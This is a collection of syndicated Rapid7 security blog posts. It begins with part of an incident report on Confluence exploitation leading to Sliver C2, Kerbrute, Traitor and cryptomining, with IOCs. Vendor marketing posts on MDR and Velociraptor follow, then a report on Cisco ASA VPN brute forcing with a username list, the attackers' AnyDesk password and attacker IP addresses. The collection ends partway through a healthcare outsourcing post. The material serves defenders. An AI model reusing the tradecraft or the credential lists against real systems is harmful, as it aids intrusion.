A review of firewall logs provided a comprehensive view of the communications between affected systems and the malicious IP address. Firewall logs filtered on traffic between the compromised servers and the malicious IP address showed inbound and outbound data transfers consistent with known C2 behavior. Rapid7 decoded and debugged the Sliver payload to extract any available Indicators of Compromise (IOCs). Within the Sliver payload, Rapid7 confirmed the following IP address 193.29.13[.]179 would communicate over port 8888 using the mTLS authentication protocol.

After Sliver first communicated with the established C2, it checked the username associated with the current session on the local system, read etc/passwd and etc/machine-id and then communicated back with the C2 again. The contents of passwd and machine-id provide system information such as the hostname and any account on the system. Cached credentials from the system were discovered to be associated with outbound C2 traffic further supporting this credential access. This activity is consistent with the standard capabilities available within the GitHub release of Sliver hosted here.

The Sliver C2 connection was later used to execute wget commands used to download Kerbrute, Traitor, and Fscan to the servers. Kerbute was executed from dev/shm and is commonly used to brute-force and enumerate valid Active Directory accounts through Kerberos pre-authentications. The Traitor binary was executed from the var/tmp directory which contains the functionality to leverage Pwnkit and Dirty Pipe as seen within evidence on the system. Fscan was executed from the var/tmp directory with the file name f and performed scanning to enumerate systems present within the environment. Rapid7 performed containment actions to deny any further threat actor activity. No additional post-exploitation objectives were identified within the environment.

Mitigation guidance

To mitigate the attacker behavior outlined in this blog, the following mitigation techniques should be considered:

Ensure that unnecessary ports and services are disabled on publicly-facing servers.
All publicly-facing servers should regularly be patched and remain up-to-date with the most recent software releases.
Environment firewall logs should be aggregated into a centralized security solution to allow for the detection of abnormal network communications.
Firewall rules should be implemented to deny inbound and outbound traffic from unapproved geolocations.
Publicly-facing servers hosting web applications should implement a restricted shell, where possible, to limit the capabilities and scope of commands available when compared to a standard bash shell.

MITRE ATT&CK Techniques

Tactics	Techniques	Details
Command and Control	Application Layer Protocol (T1071)	Sliver C2 connection
Discovery	Domain Account Discovery (T1087)	Kerbrute enumeration of Active Directory
Reconnaissance	Active Scanning (T1595)	Fscan enumeration
Privilege Escalation	Setuid and Setgid (T1548.001)	Traitor privilege escalation
Execution	Unix Shell (T1059.004)	The Sliver payload and follow-on command executions
Credential Access	Brute Force (T1110)	Kerbrute Active Directory brute force component
Credential Access	OS Credential Dumping (T1003.008)	Extracting the contents of /etc/passwd file
Impact	Resource Hijacking (T1496)	Execution of cryptomining software
Initial Access	Exploit Public-Facing Application (T1190)	Evidence of text-inline abuse within Confluence logs

Indicators of Compromise

Attribute	Value	Description
Filename and Path	/dev/shm/traitor-amd64	Privilege escalation binary
SHA256	fdfbfc07248c3359d9f1f536a406d4268f01ed63a856bd6cef9dccb3cf4f2376	Hash for Traitor binary
Filename and Path	/var/tmp/kerbrute_linux_amd64	Kerbrute enumeration of Active Directory
SHA256	710a9d2653c8bd3689e451778dab9daec0de4c4c75f900788ccf23ef254b122a	Hash for Kerbrute binary
Filename and Path	/var/tmp/f	Fscan enumeration
SHA256	b26458a0b60f4af597433fb7eff7b949ca96e59330f4e4bb85005e8bbcfa4f59	Hash for Fscan binary
Filename and Path	/tmp/X0	Sliver binary
SHA256	29bd4fa1fcf4e28816c59f9f6a248bedd7b9867a88350618115efb0ca867d736	Hash for Sliver binary
Filename and Path	/tmp/X-org	Sliver binary
SHA256	29bd4fa1fcf4e28816c59f9f6a248bedd7b9867a88350618115efb0ca867d736	Hash for Sliver binary
IP Address	193.29.13.179	Sliver C2 IP address
Filename and Path	/tmp/w.sh	Bash script for XMrigCC cryptominer
SHA256	8d7c5ab5b2cf475a0d94c2c7d82e1bbd8b506c9c80d5c991763ba6f61f1558b0	Hash for bash script
Filename and Path	/tmp/javs.tar.gz	Compressed crypto installation files
SHA256	ef7c24494224a7f0c528edf7b27c942d18933d0fc775222dd5fffd8b6256736b	Hash for crypto installation files
Log-Based IOC	"POST /template/aui/text-inline.vm HTTP/1.0 200" followed by GET request containing curl	Exploit behavior within Confluence access.log
IP Address	195.80.148.18	IP address associated with exploit behavior of text-inline followed by curl
IP Address	103.159.133.23	IP address associated with exploit behavior of text-inline followed by curl

Attackers are Working Around The Clock. Luckily, So Are We.

2023-11-30 Margaret Wei

Post Syndicated from Margaret Wei original https://blog.rapid7.com/2023/11/30/attackers-are-working-around-the-clock-luckily-so-are-we/

Attackers are Working Around The Clock. Luckily, So Are We.

It takes an average of 204 days for organizations to discover a breach, and from there an average of 73 days to contain it. With the average cost of a breach at an all time high of $4.45 million, there’s an undeniable need for teams to enlist the right experts to quickly eradicate threats.

At Rapid7, our expert SOC analysts detect and respond to threats end-to-end for MDR customers – no matter how large or complex. Rapid7’s Active Response, powered by InsightConnect SOAR Automation, enables our analysts to contain endpoints and users on your behalf within minutes of when a threat is identified, reducing attacker dwell time and keeping your organization safe from the damaging consequences of an attack.

24×7 Immediate Containment of Validated Threats with Active Response

Initially launched in 2020, we’ve now expanded Active Response to include broader asset quarantine support across third-party providers — including Crowdstrike, SentinelOne, Carbon Black Cloud, and more — as well as more transparency into MDR analyst activity to bring you more expansive, collaborative detection and response. What you can expect with Active Response:

Rapid7 MDR analysts will contain compromised endpoints or users as early in the killchain as possible to keep your organization safe from threats including malware, lateral movement, data exfiltration attempts, and more. We’ve also added a cloud-enabled option for actions to quarantine assets — removing the need for any on-prem components and making containment even faster for your organization.
Our team takes action on your behalf when we see a validated threat, but you have control of the parameters with the ability to create containment guardrails to prohibit the containment of critical servers, users, or devices. You always have the option to unquarantine assets or users directly from InsightIDR, making it extremely straightforward and keeping the power in your hands.
Rapid7’s coverage doesn’t stop there — with recommended additional actions for containment, remediation, and mitigation, our analysts ensure your organization is as secure as possible.

See How Active Response Stopped Malware in a Recent Rapid7 MDR Investigation

The following is a real-world example of a threat handled by our MDR analysts leveraging Active Response to quarantine an asset and stop malware.

Attacker Activity

[USER 1] working on legal cases used Chrome browser to visit a legitimate website compromised by malicious embedded JavaScript functions.
Embedded JavaScript file loaded pop-up, invited user to update browser by downloading ZIP archive containing JavaScript file.
Once executed, Javascript file communicated with Command and Control (C2) to download and execute a malicious payload, to fingerprint the asset, user, cached password, domains controllers, and trusted domains and output the results to a file at the root of [USER 1]’s %temp% directory to stage the host for subsequent exploitation.

Attackers are Working Around The Clock. Luckily, So Are We.

Build Resilience While You Sleep

Active Response enables teams to immediately quarantine malicious behavior before it can compromise a system, saving teams from the damaging outcomes of a successful security breach as well as costly ransomware, loss of data, and broken customer trust.

Whether it’s an intrusion attempt, suspicious process start activity, or anything in between, Rapid7’s SOC has their eyes on your environment 24x7x365, halting suspicious activity in its tracks so you can sleep peacefully through the night.

To learn more about Active Response, talk to your Customer Advisor or a representative.

When Maximum Effort Doesn’t Equate to Maximum Results

2023-11-21 Rapid7

Post Syndicated from Rapid7 original https://blog.rapid7.com/2023/11/21/when-maximum-effort-doesnt-equate-to-maximum-results/

When Maximum Effort Doesn't Equate to Maximum Results

It’s no secret that security teams are feeling beleaguered as a result of the barrage of data, events, and alerts generated by their security tools, to say nothing of the increased budget scrutiny and constrained staff resources that continue to plague cybersecurity practitioners.

The trick is finding the right balance between how much internal teams have to accomplish themselves versus how much they can cede to managed security service providers (MSSPs).

Historically, success in security operations (SecOps) was measured by how quickly teams could react to incoming threats; but the sheer number of alerts that require humans-in-the-loop to determine the accuracy and severity of security events make it nearly impossible for teams to keep up. Additionally, the number of tools deployed in a given organization today – to say nothing of the complexity required to make those tools work in concert – means reacting alone won’t get the job done anyway.

Unfortunately, many MSSPs don’t do enough to relieve customers of noisy alerts without expensive consulting agreements, which puts the burden to evaluate and remediate incidents back on already strapped in-house teams.

Traditional approaches have the added disadvantages of being too siloed, too slow, too antiquated for cloud environments, and too convoluted to demonstrate their value. Analysts at a leading research firm predict that within the next 12-18 months, 33% of organizations that currently have internal security functions will attempt and fail to build an effective internal SecOps because of resource constraints such as lack of budget, expertise, and staffing. Analysts further expect that within the next 12-18 months, 90% of internal SecOps will outsource at least 50% of their operational workloads – which makes choosing an MSSP you trust of paramount importance.

MSSPs enable organizations to maximize resilience while minimizing complexity and optimizing staff resources. The best solutions in the market will drive greater efficiency and consolidation by unifying vulnerability management and managed detection and response (MDR) into a single, cohesive security service built by practitioners for practitioners. They will offer 24x7x365 services that “follow the sun” (meaning no one service center is responsible for 100% of support calls; the work is distributed in certified centers of excellence around the world) so that top-notch support is readily available where and when you need it. Complete coverage and end-to-end detection and response services means you can feel confident that your teams are always ready for what comes next.

But it’s important to choose an MSSP that eschews a one-size-fits-all approach. Rather, look for a partner that is dynamic and flexible enough to meet the particular risk profile and business priorities of your organization, one adaptable enough to conform to changes in evolving threats and attack vectors.

Partnering with the right MSSP also allows you to optimize your SecOps for today’s distributed environments, built for the speed and scale of the cloud. Operating in the cloud means you can integrate hundreds of services with the thousands of devices connecting to them seamlessly and in real time; it also means you must protect and secure a sprawling surface with a multitude of potential entry points that threat actors can exploit.

To meet the challenge, choose an MSSP that offers complete coverage from a single, end-to-end solution so that you’re not left responding to an overabundance of events, alerts, and false positives or trying to protect an attack surface too big to contain.

Look for providers that deliver unlimited data, unlimited incident response, and unlimited intelligence so that when a forensic analysis is performed, their detailed remediation and mitigation recommendations make sure you can improve your resilience against future threats. And in the unfortunate event that a breach becomes a full-scope incident-response engagement, you want a partner that will work with you round-the-clock on the forensic investigation and deliver answers that will remove attackers from your environment as quickly as possible – without charging additional consulting fees.

Partnering with a proven MSSP will also boost your visibility across all services and devices to anticipate the most imminent risks, prevent attacks earlier, and respond to events faster. Additionally, an engagement that includes threat exposure manageability at scale through unified endpoint-to-cloud coverage can identify and respond to threats anywhere while breaking down functional and geographic silos that stall efficiency and reduce collaboration.

Critical functions like threat hunting and patch management can be automated across many tools and processes to reduce reliance on manual work. Machine learning and artificial intelligence models can be paired with internal threat telemetry data and chatbots to triage events, increase staff productivity, or produce threat reports that support more targeted and prioritized threat management across the enterprise.

Best of all, the successful use of AI and automation can help reduce the number of tools operating in your environment, which in turn decreases the complexity and cost of security operations.

It’s time to gain the edge over attackers and keep up with the fluid, ever-expanding threat landscape by eliminating threats wherever they emerge and proactively preventing breaches earlier in the kill chain. Partnering with a trusted MSSP will enable you to manage your threat exposure precisely and comprehensively, improve your signal-to-noise ratio, demonstrate tangible ROI from your security investments, and continually advance your security posture.

Learn more about the best criteria to use when reviewing the capabilities of potential MSSP partners.

Proactively Prevent Breaches with Expanded Endpoint Protection in Rapid7 MDR

2023-10-02 Rapid7

Post Syndicated from Rapid7 original https://blog.rapid7.com/2023/10/02/proactively-prevent-breaches-with-expanded-endpoint-protection-in-rapid7-mdr/

Proactively Prevent Breaches with Expanded Endpoint Protection in Rapid7 MDR

Working with thousands of security and risk professionals across the globe, we know that complexity is the top challenge SOCs are facing today. As the attack surface rapidly expands, security teams need more effective ways to keep pace with digital transformation and get out of the cycle of constant reactive fire drills.

So, we have expanded endpoint protection within our leading MDR service, Managed Threat Complete, to include native next-generation antivirus (NGAV) and DFIR powered by our universal Insight Agent.

Building on the powerful vulnerability scanning, high efficacy threat detections, and rapid containment we deliver on the endpoint today, these new capabilities help unlock critical efficiency and consolidation teams need to gain control over their dynamic attack surface.

We’re also excited to integrate Velociraptor directly into InsightIDR. The integration empowers security teams to easily collect, query, and monitor virtually any aspect of their endpoint fleets with leading digital forensics and incident response (DFIR) technology and playbooks. Already a key tool used by our Incident Response consultants in every single Incident Response engagement, customers can now experience the power and insight Velociraptor brings on the endpoint, directly in the product.

Plus, Velociraptor now uses an expressive query language (rather than code), which makes it faster and easier to share custom detections with the open source community. This helps SOC teams root out new threats more quickly, while demonstrating our continued support to open source.

Rapid7 MDR: Full coverage, single trusted partner

A Gartner study found that 75% of organizations pursued security vendor consolidation in 2022, up from 29% in 2020. And we understand why. Rapid environment expansion and constantly escalating threats—combined with a growing skills gap—have left security professionals on their heels and over-indexed on reactive measures alone. Adoption of point solutions to keep up change has resulted in more noise, inefficiency, and burnout. Previous SecOp approaches are broken – there has to be change.

Rapid7 tackles complexity head-on with a more proactive approach to security operations. By unifying relevant exposure management, external threat intelligence, and now prevention capabilities we are able to get ahead of risk and eliminate breaches earlier. This also reduces the noise and alerts downstream, enabling high efficacy threat detection, and accelerated response. With Rapid7, customers can feel confident they are covered from endpoint to the cloud, across both known and unknown threats.

While the attack surface grows, endpoints remain a critical foot in the door and target for attackers. Rapid7 delivers full threat lifecycle coverage on the endpoint via our lightweight agent, including:

Anticipate threats to prevent breaches earlier with leading vulnerability management and Next-Gen Antivirus.
Rich telemetry, unique intelligence, and curated content drives high efficacy detections.
Full kill chain visibility and streamlined automation contain threats faster than ever.
Robust forensic insights for expedited investigations and advanced hunting powered by Velociraptor.

Looking Ahead: Proactive Ransomware Prevention

As Rapid7 continues to invest in the most complete endpoint solutions, it will be addressing one of the most pervasive threats organizations face today: ransomware. Leveraging a patented approach from the integrated Minerva technology, these future capabilities will be able to recognize the earliest signals and behaviors to identify and intercept headline-making attacks before they are able to execute.

Rapid7’s incident response team is currently using this technology in the field, and soon these powerful capabilities will be available to rapid7 MDR customers. You can learn more about how Rapid7 protects endpoints here.

Unlock Broader Detections and Forensics with Velociraptor in Rapid7 XDR

2023-09-29 Shanna Battaglia

Post Syndicated from Shanna Battaglia original https://blog.rapid7.com/2023/09/29/unlock-broader-detections-forensics-with-velociraptor-in-rapid7-xdr/

Unlock Broader Detections and Forensics with Velociraptor in Rapid7 XDR

Nearly 70% of companies that are breached are likely to get breached again within twelve months (CPO). Effective remediation and addressing attacks at the root is key to staying ahead of threats and recurring breaches on the endpoint. Strong Digital Forensics and Incident Response (DFIR) ready to go when any incident occurs is a critical piece of a security team’s toolkit and drives successful response and remediation.

With this in mind, we’re excited to announce the integration of Velociraptor, Rapid7’s leading open-source DFIR framework, into the Insight Platform for InsightIDR Ultimate users — all with no additional deployment or configurations required. Already utilized in the field by our Incident Response experts on behalf of Managed Detection and Response (MDR) customers, InsightIDR Ultimate users can now experience the power of Velociraptor, from daily threat monitoring and hunting to swift threat response.

Key benefits of Velociraptor in InsightIDR:

Hunt for threats and vulnerabilities on single endpoints or across the entire fleet conveniently within InsightIDR, enabling faster identification and remediation.
Leverage the latest security researcher and practitioner-contributed Artifacts (structured YAML files containing queries) from Velociraptor’s Exchange. This ensures you always have up-to-date coverage across the current threat landscape.
Monitor for threat activity as it occurs on the endpoint, and forward matching events to InsightIDR for in-depth investigations into potential threats.
Efficiently analyze all of your Velociraptor data inside of InsightIDR with the flexibility of custom Notebooks (used to track and post process hunts or collaborate on an investigation) or the visual navigation of the Virtual File System (a server side cache of the files on the endpoint).
Unlock expanded threat detection capabilities – like EVTX or ETW watcher plug-ins to monitor Windows event sources – with Velociraptor’s Client Monitoring feature and forward alert investigations into InsightIDR.
Get to the bottom of new threats quickly with the most up-to-date detections thanks to Velociraptor’s expressive query language (rather than code) that makes it faster and easier for teams to share custom detections with the open-source community.

Let’s walk through a potential scenario with InsightIDR and Velociraptor

Jo is a SOC analyst on a team that uses Rapid7 Insight products to monitor and respond to security incidents in a fleet of a few thousand endpoints. This morning, an email notification for a new InsightIDR investigation grabs Jo’s full attention – an endpoint just triggered an alert from a usually quiet detection rule named “Velociraptor – Alert.Windows.ETW.Powershell”, and the data in the preview immediately looks suspicious to Jo.

Jo jumps into InsightIDR to begin their investigation. The endpoint in question has only triggered this single alert so far. It was forwarded from Velociraptor, a recent addition to Jo’s toolset within the Rapid7 Insight Platform. The artifact was one of several they’d deployed to endpoints for continuous monitoring. While InsightIDR and the Sysmon integration could already detect suspicious Powershell commands when included in Process Start commandline arguments, this artifact adds visibility into Windows Powershell ETW provider for logged events.

Jo follows the link to Velociraptor, provided in the InsightIDR Investigation. The link goes directly to the Alert.Windows.ETW.Powershell event page for the endpoint that triggered the investigation. From here, Jo starts a KAPE triage collection on this endpoint. Then they start a hunt across the entire fleet for the indicators of compromise they’ve gathered so far.

Data from Jo’s collection flows into the UI for review. After noticing an unfamiliar grandparent for Powershell in the process list, Jo decides to quarantine the endpoint. They go back to their InsightIDR tab, search for the affected endpoint, and toggle its Quarantine flag. Now that endpoint can only communicate with the Rapid7 Platform, which now includes Velociraptor.

Among the hundreds in the hunt’s scope, a handful of endpoints return matches for Jo’s initial queries. Jo recruits a few of their teammates to help triage the results and begin deeper investigation. Between Velociraptor’s powerful DFIR capabilities and the skills of Jo’s team, the intruder will be thwarted before completing their mission.

After the incident response concludes, Jo reviews the new Velociraptor Artifacts they created to detect this new malicious activity. They decide that a few of these will be useful submissions to the Artifact Exchange. They also take the opportunity to browse other recent additions from the DIFR community and deploy a few to their Velociraptor instance.

With Rapid7’s platform-hosted Velociraptor service, Jo’s team was able to skip another lengthy deployment process and leap right into monitoring and hunting for threats. They were also welcomed to the wider open-source Velociraptor community to share knowledge, threat intel, and DFIR techniques with the practitioners who help Velociraptor thrive.

Learn more about Velociraptor and our expanded endpoint protection.

Rapid7 Delivers Visibility Across All 19 Steps of Attack in 2023 MITRE Engenuity ATT&CK® Evaluations: Enterprise

2023-09-20 Meaghan Buchanan

Post Syndicated from Meaghan Buchanan original https://blog.rapid7.com/2023/09/20/rapid7-delivers-visibility-across-all-19-steps-of-attack-in-2023-mitre-engenuity/

Rapid7 Delivers Visibility Across All 19 Steps of Attack in 2023 MITRE Engenuity ATT&CK® Evaluations: Enterprise

Over seven years ago, we set out to change the way that SOCs approach threat detection and response. With the introduction of InsightIDR, we wanted to address the false positives and snowballing complexity that was burning out analysts, deteriorating security posture, and inhibiting necessary scale. We wanted to deliver a more intuitive and pragmatic approach, providing the most comprehensive coverage, with the strongest signal-to-noise. Today, as the robust XDR platform at the core of our leading MDR offering, InsightIDR has evolved to stay in front of emergent threats and expanding attack surfaces, while maintaining our commitment to eliminating the complexity and noise that distract and stall successful security teams.

Now we are proud to share our participation and results from the most recent MITRE Engenuity ATT&CK Evaluation: Enterprise, which highlights our ability to recognize advanced persistent threats early and across the kill chain, while maintaining disciplined signal-to-noise ratio to drive successful, real-world threat detection and response. You can find the detailed results and information about this evaluation on the MITRE Engenuity ATT&CK Evaluation: Enterprise website.

What You Need to Know

There is a lot of information to parse through in these results, so here we’ve broken down the key takeaways when it comes to this evaluation.

What is MITRE Engenuity ATT&CK Evaluations?

First, a quick primer: The MITRE ATT&CK framework is a catalog and reference point for cyberattack tactics, techniques, and procedures (TTPs). The framework provides security and risk teams with a common vernacular and guide to visualize detection coverage and map out plans to strengthen defenses. MITRE Engenuity’s ATT&CK Evaluations are a vehicle for the community to understand how technologies can help defend against known adversary behaviors. In this most recent Enterprise evaluation, the focus was on emulating Turla – a sophisticated Russia-based threat group known for their targeted intrusions and innovative stealth.

Rapid7 Delivers Complete Kill Chain Coverage

InsightIDR was able to capture relevant telemetry and detections across all 19 phases of this attack, demonstrating the ability to catch the earliest threat indicators and consistently identifying evasive behaviors as the attack progressed. This year’s attack was particularly complex, evaluating a diverse range of detections and leveraging multiple forms of endpoint telemetry. While not all techniques leave remnants for incident responders to analyze, the majority leave traces – if you have the right tools to help you look for them.

To address the need for deeper visibility to identify these traces of stealthy attacker behavior – like those emulated in this evaluation – Rapid7 has leveraged Velociraptor. In addition to providing one of the premier DFIR tools to support this kind of analysis, Velociraptor also enables real-time detection that sends alerts directly into the existing InsightIDR investigation experience so analysts do not need to pivot. This is one of the emerging capabilities of Velociraptor that the vibrant open source community continues to help strengthen day in and day out. The version of Velociraptor used in this evaluation is embedded into our existing Insight Agent and is hosted by Rapid7, which benefits from all of the open source generated artifacts and crowdsourced insights of the rapidly developed community feature set.

Strongest Signal-to-Noise for Real World Efficiency

Most importantly, we approached the evaluation with the intention of showing exactly what the experience would be for an InsightIDR customer today; no messing with our Insight Agent configurations or creating new, unrealistic exceptions just for this evaluation. What you see is what you get. And consistently, when we talk to customers, they aren’t looking for technology that fires alerts on every nuanced technique or procedure. They want to know that when something bad happens they’ll be able to pinpoint the threat as early as possible, quickly understand the scope of the attack, and know what to do about it. That’s our focus, and we are thrilled to showcase it with this evaluation.

Looking Ahead: Layered Defenses to Supercharge our Agent for Future-Ready SecOps

While IT environments continue to grow in diversity and surface area, endpoint fleets remain a critical security focus as they become increasingly distributed and remain rich sources of data and proprietary information. Endpoint detections, like those showcased in this evaluation, are one important piece of the puzzle, but successful security programs must encompass layered endpoint defenses – alongside broader ecosystem coverage.

We continue to invest to provide these layered defenses with our single, lightweight Insight Agent. From expanded pre-execution prevention and proactive risk mitigation, to high-efficacy detection of known and unknown threats, to detailed investigations, forensics, response, and automated playbooks, customers trust our Insight Agent as the nucleus of their complete endpoint security. With layered defenses across cloud, network, applications, and users, we’re also ready when attacks inevitably extend beyond the endpoint.

We are grateful once again to MITRE Engenuity for the opportunity to participate in their evaluation and for their shared commitment to open intelligence sharing and transparency. If you’re looking for a transparent partner to help you kick the complexity out of your SOC and proactively stop threats across the attack surface, we would love the opportunity to help you. Learn more about how we are driving real-world security success for customers like you.

The views and opinions expressed here are those of Rapid7 and do not necessarily reflect the views or positions of any entities they represent.

Under Siege: Rapid7-Observed Exploitation of Cisco ASA SSL VPNs

2023-08-29 Rapid7

Post Syndicated from Rapid7 original https://blog.rapid7.com/2023/08/29/under-siege-rapid7-observed-exploitation-of-cisco-asa-ssl-vpns/

Under Siege: Rapid7-Observed Exploitation of Cisco ASA SSL VPNs

Tyler Starks, Christiaan Beek, Robert Knapp, Zach Dayton, and Caitlin Condon contributed to this blog.

Rapid7’s managed detection and response (MDR) teams have observed increased threat activity targeting Cisco ASA SSL VPN appliances (physical and virtual) dating back to at least March 2023. In some cases, adversaries have conducted credential stuffing attacks that leveraged weak or default passwords; in others, the activity we’ve observed appears to be the result of targeted brute-force attacks on ASA appliances where multi-factor authentication (MFA) was either not enabled or was not enforced for all users (i.e., via MFA bypass groups). Several incidents our managed services teams have responded to ended in ransomware deployment by the Akira and LockBit groups.

There is no clear pattern among target organizations or verticals. Victim organizations varied in size and spanned healthcare, professional services, manufacturing, and oil and gas, along with other verticals. We have included indicators of compromise (IOCs) and attacker behavior observations in this blog, along with practical recommendations to help organizations strengthen their security posture against future attacks. Note: Rapid7 has not observed any bypasses or evasion of correctly configured MFA.

Rapid7 has been actively working with Cisco over the course of our investigations. On August 24, Cisco’s Product Security Incident Response Team (PSIRT) published a blog outlining attack tactics they have observed, many of which overlap with Rapid7’s observations. We thank Cisco for their collaboration and willingness to share information in service of protecting users.

Observed attacker behavior

Rapid7 identified at least 11 customers who experienced Cisco ASA-related intrusions between March 30 and August 24, 2023. Our team traced the malicious activity back to an ASA appliance servicing SSL VPNs for remote users. ASA appliance patches varied across compromised appliances — Rapid7 did not identify any particular version that was unusually susceptible to exploitation.

In our analysis of these intrusions, Rapid7 identified multiple areas of overlap among observed IOCs. The Windows clientname WIN-R84DEUE96RB was often associated with threat actor infrastructure, along with the IP addresses 176.124.201[.]200 and 162.35.92[.]242. We also saw overlap in accounts used to authenticate into internal systems, including the use of accounts TEST, CISCO, SCANUSER, and PRINTER. User domain accounts were also used to successfully authenticate to internal assets — in several cases, attackers successfully authenticated on the first try, which may indicate that the victim accounts were using weak or default credentials.

The below image is an anonymized log entry where an attacker attempts a (failed) login to the Cisco ASA SSL VPN service. In our analysis of log files across different incident response cases, we frequently observed failed login attempts occurring within milliseconds of one another, which points at automated attacks.

Under Siege: Rapid7-Observed Exploitation of Cisco ASA SSL VPNs

In most of the incidents we investigated, threat actors attempted to log into ASA appliances with a common set of usernames, including:

admin
adminadmin
backupadmin
kali
cisco
guest
accounting
developer
ftp user
training
test
printer
echo
security
inspector
test test
snmp

The above is a fairly standard list of accounts that may point at use of a brute forcing tool. In some cases, the usernames in login attempts belonged to actual domain users. While we have no specific evidence of leaked victim credentials, we are aware that it’s possible to attempt to brute force a Cisco ASA service with the path +CSCOE+/logon.htm. VPN group names are also visible in the source code of the VPN endpoint login page and can be easily extracted, which can aid brute forcing attacks.

Upon successful authentication to internal assets, threat actors deployed set.bat. Execution of set.bat resulted in the installation and execution of the remote desktop application AnyDesk, with a set password of greenday#@!. In some cases, nd.exe was executed on systems to dump NTDS.DIT, as well as the SAM and SYSTEM hives, which may have given the adversary access to additional domain user credentials. The threat actors performed further lateral movement and binary executions across other systems within target environments to increase the scope of compromise. As mentioned previously, several of the intrusions culminated in the deployment and execution of Akira or LockBit-related ransomware binaries.

Dark web activity

In parallel with incident response investigations into ASA-based intrusions, Rapid7 threat intelligence teams have been monitoring underground forums and Telegram channels for threat actor discussion about these types of attacks. In February 2023, a well-known initial access broker called “Bassterlord” was observed in XSS forums selling a guide on breaking into corporate networks. The guide, which included chapters on SSL VPN brute forcing, was being sold for $10,000 USD.

When several other forums started leaking information from the guide, Bassterlord posted on Twitter about shifting to a content rental model rather than selling the guide wholesale:

Rapid7 obtained a leaked copy of the manual and analyzed its content. Notably, the author claimed they had compromised 4,865 Cisco SSL VPN services and 9,870 Fortinet VPN services with the username/password combination test:test. It’s possible that, given the timing of the dark web discussion and the increased threat activity we observed, the manual’s instruction contributed to the uptick in brute force attacks targeting Cisco ASA VPNs.

Indicators of compromise

Rapid7 identified the following IP addresses associated with source authentication events to compromised internal assets, as well as outbound connections from AnyDesk:

161.35.92.242
173.208.205.10
185.157.162.21
185.193.64.226
149.93.239.176
158.255.215.236
95.181.150.173
94.232.44.118
194.28.112.157
5.61.43.231
5.183.253.129
45.80.107.220
193.233.230.161
149.57.12.131
149.57.15.181
193.233.228.183
45.66.209.122
95.181.148.101
193.233.228.86
176.124.201.200
162.35.92.242
144.217.86.109

Other IP addresses that were observed conducting brute force attempts:

31.184.236.63
31.184.236.71
31.184.236.79
194.28.112.149
62.233.50.19
194.28.112.156
45.227.255.51
185.92.72.135
80.66.66.175
62.233.50.11
62.233.50.13
194.28.115.124
62.233.50.81
152.89.196.185
91.240.118.9
185.81.68.45
152.89.196.186
185.81.68.46
185.81.68.74
62.233.50.25
62.233.50.17
62.233.50.23
62.233.50.101
62.233.50.102
62.233.50.95
62.233.50.103
92.255.57.202
91.240.118.5
91.240.118.8
91.240.118.7
91.240.118.4
161.35.92.242
45.227.252.237
147.78.47.245
46.161.27.123
94.232.43.143
94.232.43.250
80.66.76.18
94.232.42.109
179.60.147.152
185.81.68.197
185.81.68.75

Many of the IP addresses above were hosted by the following providers:

Chang Way Technologies Co. Limited
Flyservers S.A.
Xhost Internet Solutions Lp
NFOrce Entertainment B.V.
VDSina Hosting

Log-based indicators:

Login attempts with invalid username and password combinations (%ASA-6-113015)
RAVPN session creation (attempts) for unexpected profiles/TGs (%ASA-4-113019, %ASA-4-722041, %ASA-7-734003)

Mitigation guidance

As Rapid7’s mid-year threat review noted, nearly 40% of all incidents our managed services teams responded to in the first half of 2023 stemmed from lack of MFA on VPN or virtual desktop infrastructure. These incidents reinforce that use of weak or default credentials remains common, and that credentials in general are often not protected as a result of lax MFA enforcement in corporate networks.

To mitigate the risk of the attacker behavior outlined in this blog, organizations should:

Ensure default accounts have been disabled or passwords have been reset from the default.
Ensure MFA is enforced across all VPN users, limiting exceptions to this policy as much as possible.
Enable logging on VPNs: Cisco has information on doing this for ASA specifically here, along with guidance on collecting forensic evidence from ASA devices here.
Monitor VPN logs for authentication attempts occurring outside expected locations of employees.
Monitor VPN logs for failed authentications, looking for brute forcing and password spraying patterns.
As a best practice, keep current on patches for security issues in VPNs, virtual desktop infrastructure, and other gateway devices.

Rapid7 is monitoring MDR customers for anomalous authentication events and signs of brute forcing and password spraying. For InsightIDR and MDR customers, the following non-exhaustive list of detection rules are deployed and alerting on activity related to the attack patterns in this blog:

Ingress Auth by Local ASA Account
Attacker Technique – NTDS File Access
Attacker Tool – Impacket Lateral Movement
Process Spawned By SoftPerfect Network Scanner
Execution From Root of ProgramData

Various sources have recently published pieces noting that ransomware groups appear to be targeting Cisco VPNs to gain access to corporate networks. Rapid7 strongly recommends reviewing the IOCs and related information in this blog and in Cisco’s PSIRT blog and taking action to strengthen security posture for VPN implementations.

Healthcare Orgs: Do You Need an Outsourced SOC?

2023-05-24 Rapid7

Post Syndicated from Rapid7 original https://blog.rapid7.com/2023/05/24/healthcare-orgs-do-you-need-an-outsourced-soc/

Healthcare Orgs: Do You Need an Outsourced SOC?

Gartner predicts that 50% of organizations will partner with an external MDR (Managed Detection and Response) service by 2025 for around-the-clock monitoring. What determines where healthcare organizations fall on that 50/50 split over using an outsourced SOC? It usually comes down to their ability to adapt to the current needs of the healthcare industry.

A growing demand for improved healthcare services means more healthcare providers are turning to the cloud. But for a world built on strict regulations and literal life-or-death situations, migrating too quickly to the cloud can be a serious challenge. When healthcare teams take on cloud adoption too fast, then run the risk of:

Accumulating cloud services that fall through security cracks—AKA shadow IT
Expanding their organization’s attack surface without a means of defense, opening up more opportunities for breaches and leaks

That’s where the help of an outsourced SOC comes in. With an extra team of experts on board, healthcare organizations can secure new ephemeral environments—without putting their security teams through resource strain or burnout.

Still, it can be tough for healthcare organizations to identify when it’s time to outsource, if ever at all. Here are some tell-tale signs that outsourcing a SOC and investing in managed services is the right call.

Your Teams Are Already Overwhelmed

While most healthcare organizations have a trusted team of a few security experts, they’re usually smaller than most security teams in tech enterprises, snappy startups, or other more cyber-savvy industries. That leads to a tricky cycle of needing to do more with fewer resources.

A day in the life of a security engineer in healthcare is marked by a seemingly endless game of catchup—one that doesn’t support speed, efficiency, or a successful migration to the cloud.

If your organization’s security teams are:

Struggling to find qualified talent
Overwhelmed by firefighting every single incident on their plate
Tired of combing through seas of alerts—some of which are false positives
Burned out by carrying out repetitive and mundane tasks that could be automated

You’re Super New to the Cloud

Healthcare security teams are typically IT or network pros who are well-acquainted and well-trained to defend traditional environments. However, there may be knowledge gaps when it comes to healthcare’s approach to cloud security. But with global cyber attacks on healthcare organizations rising 74% per week in 2022, security teams have no time to waste learning how to protect cloud environments.

Investing in the right education and training for healthcare’s traditional security pros simply takes time and effort that many organizations can’t afford to waste. But with an external SOC, security teams can:

Rely on cloud security experts to handle the trickiest parts of the process
Learn as they go with the guidance of seasoned professionals
